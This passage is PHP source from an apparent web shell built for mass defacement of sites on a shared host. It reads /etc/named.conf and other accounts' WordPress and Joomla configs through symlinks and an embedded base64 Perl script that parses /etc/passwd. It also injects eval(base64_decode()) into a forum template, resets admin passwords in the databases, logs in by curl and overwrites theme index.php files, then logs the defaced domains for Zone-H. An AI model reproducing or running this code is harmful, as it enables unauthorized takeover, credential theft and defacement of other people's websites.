$_POST['username'];$password = $_POST['password'];$perfix =
$_POST['perfix'];$index =
$_POST['index'];@mysql_connect($localhost,$username,$password) or
die(mysql_error());@mysql_select_db($database) or
die(mysql_error());$index=str_replace(&quot;\'&quot;,&quot;'&quot;,$index);$set_index =
&quot;{\${eval(base64_decode(\'&quot;;$set_index .= base64_encode(&quot;echo
'$index';&quot;);$set_index .=
&quot;\'))}}{\${exit()}}&lt;/textarea&gt;&quot;;$ok=@mysql_query(&quot;UPDATE
&quot;.$perfix.&quot;template SET template ='&quot;.$set_index.&quot;' WHERE title
='FORUMHOME'&quot;) or die(mysql_error());if($ok){echo &quot;Defaced&lt;br&gt;&lt;br&gt;&quot;;}}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'boom')){error_reporting(0);function
entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($ma
rqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return
trim($ar1[0]);}function randomt() {$chars =
&quot;abcdefghijkmnopqrstuvwxyz023456789&quot;;srand((double)microtime()*1000000);$
i = 0;$pass = '';while ($i &lt;= 7) {$num = rand() % 33;$tmp =
substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function
index_changer_wp($conf, $content) {$output = '';$dol = '$';$go =
0;$username = entre2v2($conf,&quot;define('DB_USER', '&quot;,&quot;');&quot;);$password =
entre2v2($conf,&quot;define('DB_PASSWORD', '&quot;,&quot;');&quot;);$dbname =
entre2v2($conf,&quot;define('DB_NAME', '&quot;,&quot;');&quot;);$prefix =
entre2v2($conf,$dol.&quot;table_prefix = '&quot;,&quot;'&quot;);$host =
entre2v2($conf,&quot;define('DB_HOST',
'&quot;,&quot;');&quot;);$link=mysql_connect($host,$username,$password);if($link)
{mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query(&quot;UPDATE
`&quot;.$prefix.&quot;users` SET `user_login` = 'admin',`user_pass` =
'4297f44b13955235245b2497399d7a93' WHERE `ID` = 1&quot;);} else {$output.= &quot;[-
] DB Error&lt;br /&gt;&quot;;}if($req1) {$req = mysql_query(&quot;SELECT * from
`&quot;.$prefix.&quot;options` WHERE option_name='home'&quot;);$data =
mysql_fetch_array($req);$site_url=$data[&quot;option_value&quot;]; $req =
mysql_query(&quot;SELECT * from `&quot;.$prefix.&quot;options` WHERE
option_name='template'&quot;);$data = mysql_fetch_array($req);$template =
$data[&quot;option_value&quot;];$req = mysql_query(&quot;SELECT * from
`&quot;.$prefix.&quot;options` WHERE option_name='current_theme'&quot;);$data =
mysql_fetch_array($req);$current_theme =
$data[&quot;option_value&quot;];$useragent=&quot;Mozilla/4.0 (compatible; MSIE 7.0b;
Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR
2.0.50727)&quot;;$url2=$site_url.&quot;/wp-login.php&quot;;$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch,
CURLOPT_POST, 1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;log=admin&amp;pwd=123123&amp;rememberme=forever&amp;wp-submit=Log
In&amp;testcookie=1&quot;);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,
10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, &quot;COOKIE.txt&quot;);curl_setopt($ch, CURLOPT_COOKIEFILE,
&quot;COOKIE.txt&quot;);$buffer = curl_exec($ch);$pos =
strpos($buffer,&quot;action=logout&quot;);if($pos === false) {$output.= &quot;[-] Login
Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+] Login Successful&lt;br /&gt;&quot;;$go =
1;}if($go) {$cond = 0;$url2=$site_url.&quot;/wp-admin/themeeditor.php?file=/themes/&quot;.$template.'/index.php&amp;theme='.urlencode($curren
t_theme).'&amp;dir=theme';curl_setopt($ch, CURLOPT_URL,
$url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch,
CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, &quot;COOKIE.txt&quot;);curl_setopt($ch, CURLOPT_COOKIEFILE,
&quot;COOKIE.txt&quot;);$buffer0 = curl_exec($ch);$_wpnonce =
entre2v2($buffer0,'&lt;input type=&quot;hidden&quot; id=&quot;_wpnonce&quot; name=&quot;_wpnonce&quot;
value=&quot;','&quot; /&gt;');$_file = entre2v2($buffer0,'&lt;input type=&quot;hidden&quot;
name=&quot;file&quot; value=&quot;','&quot; /&gt;');if(substr_count($_file,&quot;/index.php&quot;) !=
0){$output.= &quot;[+] index.php loaded in Theme Editor&lt;br
/&gt;&quot;;$url2=$site_url.&quot;/wp-admin/theme-editor.php&quot;;curl_setopt($ch,
CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;newcontent=&quot;.base64_decode($content).&quot;&amp;action=update&amp;
file=&quot;.$_file.&quot;&amp;_wpnonce=&quot;.$_wpnonce.&quot;&amp;submit=Update
File&quot;);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, &quot;COOKIE.txt&quot;);curl_setopt($ch, CURLOPT_COOKIEFILE,
&quot;COOKIE.txt&quot;);$buffer = curl_exec($ch);curl_close($ch);$pos =
strpos($buffer,'&lt;div id=&quot;message&quot; class=&quot;updated&quot;&gt;');if($pos === false)
{$output.= &quot;[-] Updating Index.php Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+]
Index.php Updated Successfuly&lt;br /&gt;&quot;;$hk =
explode('public_html',$_file);$output.= '[+] Deface
'.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond =
1;}} else {$url2=$site_url.'/wp-admin/themeeditor.php?file=index.php&amp;theme='.$template;curl_setopt($ch, CURLOPT_URL,
$url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, &quot;COOKIE.txt&quot;);curl_setopt($ch, CURLOPT_COOKIEFILE,
&quot;COOKIE.txt&quot;);$buffer0 = curl_exec($ch);$_wpnonce =
entre2v2($buffer0,'&lt;input type=&quot;hidden&quot; id=&quot;_wpnonce&quot; name=&quot;_wpnonce&quot;
value=&quot;','&quot; /&gt;');$_file = entre2v2($buffer0,'&lt;input type=&quot;hidden&quot;
name=&quot;file&quot; value=&quot;','&quot; /&gt;');if(substr_count($_file,&quot;index.php&quot;) !=
0){$output.= &quot;[+] index.php loaded in Theme Editor&lt;br
/&gt;&quot;;$url2=$site_url.&quot;/wp-admin/theme-editor.php&quot;;curl_setopt($ch,
CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;newcontent=&quot;.base64_decode($content).&quot;&amp;action=update&amp;
file=&quot;.$_file.&quot;&amp;theme=&quot;.$template.&quot;&amp;_wpnonce=&quot;.$_wpnonce.&quot;&amp;submit=Update
File&quot;);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, &quot;COOKIE.txt&quot;);curl_setopt($ch, CURLOPT_COOKIEFILE,
&quot;COOKIE.txt&quot;);$buffer = curl_exec($ch);curl_close($ch);$pos =
strpos($buffer,'&lt;div id=&quot;message&quot; class=&quot;updated&quot;&gt;');if($pos === false)
{$output.= &quot;[-] Updating Index.php Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+]
Index.php Template Updated Successfuly&lt;br /&gt;&quot;;$output.= '[+] Deface
'.file_get_contents($site_url.'/wpcontent/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= &quot;[] index.php can not load in Theme Editor&lt;br /&gt;&quot;;}}}} else {$output.= &quot;[-]
DB Error&lt;br /&gt;&quot;;}global $base_path;unlink($base_path.'COOKIE.txt');return
array('cond'=&gt;$cond, 'output'=&gt;$output);}function
index_changer_joomla($conf, $content, $domain) {$doler = '$';$username =
entre2v2($conf, $doler.&quot;user = '&quot;, &quot;';&quot;);$password = entre2v2($conf,
$doler.&quot;password = '&quot;, &quot;';&quot;);$dbname = entre2v2($conf, $doler.&quot;db = '&quot;,
&quot;';&quot;);$prefix = entre2v2($conf, $doler.&quot;dbprefix = '&quot;, &quot;';&quot;);$host =
entre2v2($conf, $doler.&quot;host = '&quot;,&quot;';&quot;);$co=randomt();$site_url =
&quot;http://&quot;.$domain.&quot;/administrator&quot;;$output = '';$cond = 0;
$link=mysql_connect($host, $username, $password);if($link)
{mysql_select_db($dbname,$link) ;$req1 = mysql_query(&quot;UPDATE
`&quot;.$prefix.&quot;users` SET `username` ='admin' , `password` =
'4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator',
`block` = 0&quot;);$req = mysql_numrows(mysql_query(&quot;SHOW TABLES LIKE
'&quot;.$prefix.&quot;extensions'&quot;));} else {$output.= &quot;[-] DB Error&lt;br
/&gt;&quot;;}if($req1){if ($req) {$req = mysql_query(&quot;SELECT * from
`&quot;.$prefix.&quot;template_styles` WHERE `client_id` = '0' and `home` =
'1'&quot;);$data = mysql_fetch_array($req);$template_name =
$data[&quot;template&quot;];$req = mysql_query(&quot;SELECT * from
`&quot;.$prefix.&quot;extensions` WHERE `name`='&quot;.$template_name.&quot;' or `element` =
'&quot;.$template_name.&quot;'&quot;);$data = mysql_fetch_array($req);$template_id =
$data[&quot;extension_id&quot;];$url2=$site_url.&quot;/index.php&quot;;$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch,
CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch,
CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer =
curl_exec($ch);$return = entre2v2($buffer ,'&lt;input type=&quot;hidden&quot;
name=&quot;return&quot; value=&quot;','&quot;');$hidden = entre2v2($buffer ,'&lt;input
type=&quot;hidden&quot; name=&quot;','&quot; value=&quot;1&quot;',4);if($return &amp;&amp; $hidden)
{curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST,
1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch,
CURLOPT_POSTFIELDS,
&quot;username=admin&amp;passwd=123123&amp;option=com_login&amp;task=login&amp;return=&quot;.$retur
n.&quot;&amp;&quot;.$hidden.&quot;=1&quot;);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch,
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch,
CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos =
strpos($buffer,&quot;com_config&quot;);if($pos === false) {$output.= &quot;[-] Login
Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+] Login Successful&lt;br
/&gt;&quot;;}}if($pos){$url2=$site_url.&quot;/index.php?option=com_templates&amp;task=sour
ce.edit&amp;id=&quot;.base64_encode($template_id.&quot;:index.php&quot;);$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch,
CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch,
CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer =
curl_exec($ch);$hidden2=entre2v2($buffer ,'&lt;input type=&quot;hidden&quot;
name=&quot;','&quot; value=&quot;1&quot;',2);if($hidden2) {$output.= &quot;[+] index.php file
found in Theme Editor&lt;br /&gt;&quot;;} else {$output.= &quot;[-] index.php Not found
in Theme Editor&lt;br /&gt;&quot;;}}if($hidden2)
{$url2=$site_url.&quot;/index.php?option=com_templates&amp;layout=edit&quot;;$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch,
CURLOPT_POST, 1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;jform[source]=&quot;.$content.&quot;&amp;jform[filename]=index.php&amp;
jform[extension_id]=&quot;.$template_id.&quot;&amp;&quot;.$hidden2.&quot;=1&amp;task=source.save&quot;);cu
rl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER,
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch,
CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'&lt;dd
class=&quot;message message&quot;&gt;');$cond = 0;if($pos === false) {$output.= &quot;[-]
Updating Index.php Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+] Index.php Template
successfully saved&lt;br /&gt;&quot;;$cond = 1;}}} else {$req =mysql_query(&quot;SELECT *
from `&quot;.$prefix.&quot;templates_menu` WHERE client_id='0'&quot;);$data =
mysql_fetch_array($req);$template_name=$data[&quot;template&quot;];$useragent=&quot;Mozi
lla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa
Toolbar; .NET CLR 2.0.50727)&quot;;$url2=$site_url.&quot;/index.php&quot;;$ch =
curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch,
CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,
1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch,
CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch,
CURLOPT_COOKIEFILE, $co); $buffer =
curl_exec($ch);$hidden=entre2v2($buffer ,'&lt;input type=&quot;hidden&quot; name=&quot;','&quot;
value=&quot;1&quot;',3);if($hidden) {curl_setopt($ch, CURLOPT_URL,
$url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;username=admin&amp;passwd=123456&amp;option=com_login&amp;task=lo
gin&amp;&quot;.$hidden.&quot;=1&quot;);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch,
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch,
CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos =
strpos($buffer,&quot;com_config&quot;);if($pos === false) {$output.= &quot;[-] Login
Error&lt;br /&gt;&quot;;} else {$output.= &quot;[+] Login Successful&lt;br /&gt;&quot;;}}if($pos)
{$url2=$site_url.&quot;/index.php?option=com_templates&amp;task=edit_source&amp;client
=0&amp;id=&quot;.$template_name;curl_setopt($ch, CURLOPT_URL,
$url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch,
CURLOPT_COOKIEFILE, $co); $buffer =
curl_exec($ch);$hidden2=entre2v2($buffer ,'&lt;input type=&quot;hidden&quot;
name=&quot;','&quot; value=&quot;1&quot;',6);if($hidden2) {$output.= &quot;[+] index.php file
founded in Theme Editor&lt;br /&gt;&quot;;} else {$output.= &quot;[-] index.php Not found
in Theme Editor&lt;br /&gt;&quot;;}}if($hidden2)
{$url2=$site_url.&quot;/index.php?option=com_templates&amp;layout=edit&quot;;curl_setop
t($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST,
1);curl_setopt($ch,
CURLOPT_POSTFIELDS,&quot;filecontent=&quot;.$content.&quot;&amp;id=&quot;.$template_name.&quot;&amp;cid[]=
&quot;.$template_name.&quot;&amp;&quot;.$hidden2.&quot;=1&amp;task=save_source&amp;client=0&quot;);curl_setopt
($ch, CURLOPT_FOLLOWLOCATION,
1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT,
$useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch,
CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos =
strpos($buffer,'&lt;dd class=&quot;message message fade&quot;&gt;');$cond = 0;if($pos ===
false) {$output.= &quot;[-] Updating Index.php Error&lt;br /&gt;&quot;;} else {$output.=
&quot;[+] Index.php Template successfully saved&lt;br /&gt;&quot;;$cond = 1;}}}} else
{$output.= &quot;[-] DB Error&lt;br /&gt;&quot;;}global
$base_path;unlink($base_path.$co);return array('cond'=&gt;$cond,
'output'=&gt;$output); }function exec_mode_1($def_url)
{@mkdir('sym',0777);$wr = &quot;Options all \n DirectoryIndex Sux.html \n
AddType text/plain .php \n AddHandler server-parsed .php \n AddType
text/plain .html \n AddHandler txt .html \n Require None \n Satisfy
Any&quot;;$fp = @fopen ('sym/.htaccess','w');fwrite($fp,
$wr);@symlink('/','sym/root');$dominios =
@file_get_contents(&quot;/etc/named.conf&quot;);@preg_match_all('/.*?zone &quot;(.*?)&quot;
{/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios =
count($out[1]);echo &quot;Total domains: $numero_dominios &lt;br&gt;&lt;br /&gt;&quot;;$def =
file_get_contents($def_url);$def = urlencode($def);$dd =
'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5v
cmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZ
SgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY1
9odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGV
uKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAg
ICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmc
DEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KIC
AgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcig
kaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url =
'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/
root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] =
(isset($_GET['st']) &amp;&amp; $_GET['st']!='') ? (isset($_SESSION['count1']) ?
$_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) &amp;&amp;
$_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 )
: 0;echo '&lt;table style=&quot;width:75%;&quot;&gt;&lt;tr style=&quot;background:rgba(160, 82,
45,0.6);&quot;&gt;&lt;th&gt;ID&lt;/th&gt;&lt;th&gt;SID&lt;/th&gt;&lt;th&gt;Domain&lt;/th&gt;&lt;th&gt;Type&lt;/th&gt;&lt;th&gt;Action&lt;/
th&gt;&lt;th&gt;Status&lt;/th&gt;&lt;/tr&gt;';$j = 1;$st = (isset($_GET['st']) &amp;&amp;
$_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i &lt;= $numero_dominios;
$i++){$domain = $out[1][$i];$dono_arquivo =
@fileowner(&quot;/etc/valiases/&quot;.$domain);$infos =
@posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 =
@file_get_contents($base_url.$infos['name'].&quot;/public_html/configuration.p
hp&quot;);$config02 =
@file_get_contents($base_url.$infos['name'].&quot;/public_html/wpconfig.php&quot;);$config03 =
@file_get_contents($base_url.$infos['name'].&quot;/public_html/blog/wpconfig.php&quot;);$cls = ($j % 2 == 0) ? 'class=&quot;even&quot;' :
'class=&quot;odd&quot;';if($config01 &amp;&amp; preg_match('/dbprefix/i',$config01)){echo
'&lt;tr '.$cls.'&gt;&lt;td align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td
align=&quot;center&quot;&gt;'.$i.'&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;http://'.$domain.'&quot;
target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td align=&quot;center&quot;&gt;&lt;font
color=&quot;pink&quot;&gt;JOOMLA&lt;/font&gt;&lt;/td&gt;';$res = index_changer_joomla($config01,
$def, $domain);echo '&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo
'&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$_SESSION['count1'] = $_SESSION['count1'] + 1;}
else {echo '&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo '&lt;/tr&gt;';}if($config02 &amp;&amp;
preg_match('/DB_NAME/i',$config02)){echo '&lt;tr '.$cls.'&gt;&lt;td
align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td align=&quot;center&quot;&gt;'.$i.'&lt;/td&gt;&lt;td&gt;&lt;a
href=&quot;http://'.$domain.'&quot; target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td
align=&quot;center&quot;&gt;&lt;font color=&quot;yellow&quot;&gt;WORDPRESS&lt;/font&gt;&lt;/td&gt;';$res =
index_changer_wp($config02, $dd);echo
'&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$_SESSION['count2'] = $_SESSION['count2'] + 1;}
else {echo '&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo '&lt;/tr&gt;';}$cls = ($j % 2 == 0) ?
'class=&quot;even&quot;' : 'class=&quot;odd&quot;';if($config03 &amp;&amp;
preg_match('/DB_NAME/i',$config03)){echo '&lt;tr '.$cls.'&gt;&lt;td
align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td align=&quot;center&quot;&gt;'.$i.'&lt;/td&gt;&lt;td&gt;&lt;a
href=&quot;http://'.$domain.'&quot; target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td
align=&quot;center&quot;&gt;&lt;font color=&quot;yellow&quot;&gt;WORDPRESS&lt;/font&gt;&lt;/td&gt;';$res =
index_changer_wp($config03, $dd);echo
'&lt;td&gt;'.$res['output'].'&lt;/td&gt;';if($res['cond']) {echo '&lt;td
align=&quot;center&quot;&gt;&lt;span class=&quot;green&quot;&gt;DEFACED&lt;/span&gt;&lt;/td&gt;';fwrite($output,
'http://'.$domain.&quot;&lt;br&gt;&quot;);$_SESSION['count2'] = $_SESSION['count2'] + 1;}
else {echo '&lt;td align=&quot;center&quot;&gt;&lt;span
class=&quot;red&quot;&gt;FAILED&lt;/span&gt;&lt;/td&gt;';}echo '&lt;/tr&gt;';}}}echo '&lt;/table&gt;';echo
'&lt;hr/&gt;';echo 'Total Defaced =
'.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA =
'.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')&lt;br /&gt;';echo
'&lt;a href=&quot;defaced.html&quot; target=&quot;_blank&quot;&gt;View Total Defaced urls&lt;/a&gt;&lt;br
/&gt;';if($_SESSION['count1']+$_SESSION['count2'] &gt; 0){echo '&lt;a
href=&quot;'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&amp;zh=1&quot;
target=&quot;_blank&quot; id=&quot;zhso&quot;&gt;Send to Zone-H&lt;/a&gt;';}}function
exec_mode_2($def_url) {$domains =
@file_get_contents(&quot;/etc/named.conf&quot;);@preg_match_all('/.*?zone &quot;(.*?)&quot;
{/', $domains, $out);$out = array_unique($out[1]);$num =
count($out);print(&quot;Total domains: $num&lt;br&gt;&lt;br /&gt;&quot;);$def =
file_get_contents($def_url);$def = urlencode($def);$output =
fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo
'&lt;table style=&quot;width:75%;&quot;&gt;&lt;tr style=&quot;background:rgba(160, 82,
45,0.6);&quot;&gt;&lt;th&gt;ID&lt;/th&gt;&lt;th&gt;SID&lt;/th&gt;&lt;th&gt;Domain&lt;/th&gt;&lt;th&gt;Type&lt;/th&gt;&lt;th&gt;Action&lt;/
th&gt;&lt;th&gt;Status&lt;/th&gt;&lt;/tr&gt;';$j = 1;$map = array();foreach($out as $d) {$info
= @posix_getpwuid(fileowner(&quot;/etc/valiases/&quot;.$d));$map[$info['name']] =
$d;}$dt =
'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgk
dXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBz
eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3l
tbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW
5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb
2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0K
DQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk
7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc'
, base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = &quot;Options
FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpdcgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc&quot;;$fp =
@fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res =
file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCR
IPT_NAME']).'/plsym/plsym.cc'); $url =
'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsy
m/';unlink('plsym/plsym.cc');$data =
file_get_contents($url);preg_match_all('/&lt;a href=&quot;(.+)&quot;&gt;/', $data,
$match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz =
explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] ==
'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] ==
'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain =
$map[$mz[0]];$cls = ($j % 2 == 0) ? 'class=&quot;even&quot;' :
'class=&quot;odd&quot;';if($config01 &amp;&amp; preg_match('/dbprefix/i',$config01)){echo
'&lt;tr '.$cls.'&gt;&lt;td align=&quot;center&quot;&gt;'.($j++).'&lt;/td&gt;&lt;td
align=&quot;center&quot;&gt;'.$i++.'&lt;/td&gt;&lt;td&gt;&lt;a href=&quot;http://'.$domain.'&quot;
target=&quot;blank&quot;&gt;'.$domain.'&lt;/a&gt;&lt;/td&gt;';echo '&lt;td align=&quot;center&quot;&gt;&lt;font
